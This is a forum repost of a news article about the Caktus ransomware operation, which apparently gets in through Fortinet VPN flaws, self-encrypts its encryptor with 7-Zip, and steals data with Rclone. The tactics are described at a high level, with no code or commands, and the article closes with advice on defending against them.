Jump to content
  • Caktus Ransomware creates a thorny situation in the internet

    alf9872000

    • 346 views
    • 3 minutes
     Share


    • 346 views
    • 3 minutes

    A new ransomware operation, named Caktus ransomware, has been targeting large commercial entities since March this year. The threat actor behind Caktus has been exploiting vulnerabilities in VPN appliances to gain initial access to networks.

     

    This operation has been seeking significant payouts from its victims, and while it employs common ransomware tactics such as file encryption and data theft, it utilizes unique methods to avoid detection.

     

    According to researchers at Kroll corporate investigation and risk consulting firm, the Caktus ransomware operation has been exploiting known vulnerabilities in Fortinet VPN appliances to gain initial access to victim networks.

     

    The researchers observed that in all incidents investigated, the hacker pivoted inside from a VPN server with a VPN service account. This approach highlights the importance of patching and securing VPN appliances and other network entry points to prevent threat actors from exploiting known vulnerabilities.

     

    Caktus-ransomware_1.jpg

    Caktus ransomware has been researched by Kroll

    Caktus ransomware's unique method of self-encryption

    What sets Caktus apart from other ransomware operations is its use of encryption to protect the ransomware binary. The threat actor uses a batch script to obtain the encryptor binary using 7-Zip. The entire process is unusual and researchers believe that this is to prevent the detection of the ransomware encryptor. Caktus essentially encrypts itself, making it more difficult to detect and evade antivirus and network monitoring tools.

     

    Once inside a network, Caktus uses a scheduled task for persistent access and relies on SoftPerfect Network Scanner (netscan) to identify interesting targets on the network. The threat actor uses PowerShell commands to enumerate endpoints, identify user accounts, and ping remote hosts for deeper reconnaissance. Kroll investigators found that Caktus also used a modified variant of the open-source PSnmap Tool and tried multiple remote access methods through legitimate tools and the Go-based proxy tool Chisel.

     

    Caktus ransomware steals data from victims, which is transferred to cloud storage using the Rclone tool. After exfiltrating data, the hackers use a PowerShell script called TotalExec to automate the deployment of the encryption process. The encryption routine in Caktus ransomware attacks is unique, but a similar encryption process has been recently adopted by the BlackBasta ransomware gang.

     

    Caktus-ransomware_2.jpg

    Caktus ransomware is after victims' data

    The impact of Caktus ransomware attacks

    While there is no public information about the ransoms that Caktus demands from its victims, sources suggest that they are in the millions. Although the hackers do not appear to have set up a leak site, they do threaten victims with publishing the stolen files unless they receive payment. The incursions by Caktus so far likely leveraged vulnerabilities in the Fortinet VPN appliance and followed the standard double-extortion approach by stealing data before encrypting it.

    How to protect yourself against Caktus ransomware?

    To protect against the final and most damaging stages of a ransomware attack, it is recommended to apply the latest software updates, monitor the network for large data exfiltration tasks, and respond quickly.

     

    Organizations should prioritize patching vulnerabilities in their VPN appliances and other network entry points to prevent threat actors from exploiting known vulnerabilities. Additionally, implementing multi-factor authentication and endpoint security solutions can provide an extra layer of defense against ransomware attacks. Here are the Best VPN Extensions for Google Chrome and to stay secure.

     

    Source


    User Feedback

    Recommended Comments

    There are no comments to display.



    Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Add a comment...

    ×   Pasted as rich text.   Paste as plain text instead

      Only 75 emoji are allowed.

    ×   Your link has been automatically embedded.   Display as a link instead

    ×   Your previous content has been restored.   Clear editor

    ×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...